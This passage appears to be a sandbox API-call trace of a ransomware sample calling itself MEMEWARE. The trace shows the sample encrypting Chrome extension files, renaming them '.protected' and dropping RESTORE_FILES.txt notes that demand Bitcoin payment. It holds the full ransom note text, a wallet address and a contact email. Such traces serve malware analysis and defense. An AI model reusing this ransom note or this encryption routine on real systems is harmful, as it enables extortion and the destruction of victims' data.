(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.540] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.542] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.542] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.542] CloseHandle (hObject=0x164) returned 1 [0079.542] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.542] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.542] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv") returned 142 [0079.542] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.542] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.542] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*") returned 144 [0079.542] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.543] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.543] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\.") returned 144 [0079.543] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.543] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\..") returned 145 [0079.543] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.543] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.543] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.543] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.543] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.543] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.543] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.543] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.543] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.544] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json") returned 156 [0079.544] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.544] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0079.550] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff03, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.550] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xfd, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xfd, lpOverlapped=0x0) returned 1 [0079.582] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.583] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.583] CloseHandle (hObject=0x168) returned 1 [0079.583] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected") returned 166 [0079.583] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.584] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.584] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.584] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\RESTORE_FILES.txt") returned 160 [0079.584] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.598] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.598] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.599] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.599] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.599] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.599] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.599] CloseHandle (hObject=0x164) returned 1 [0079.599] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.599] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.599] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th") returned 142 [0079.599] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.599] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.599] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*") returned 144 [0079.599] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.600] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\.") returned 144 [0079.600] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\..") returned 145 [0079.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.600] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.600] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.600] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.600] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.600] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.600] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.600] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.600] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.601] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json") returned 156 [0079.601] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.601] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x164, lpOverlapped=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffe9c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x164, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x164, lpOverlapped=0x0) returned 1 [0079.607] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.607] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.608] CloseHandle (hObject=0x168) returned 1 [0079.608] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected") returned 166 [0079.608] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.608] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.608] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.608] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 160 [0079.609] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.609] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.609] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.610] lstrlenA 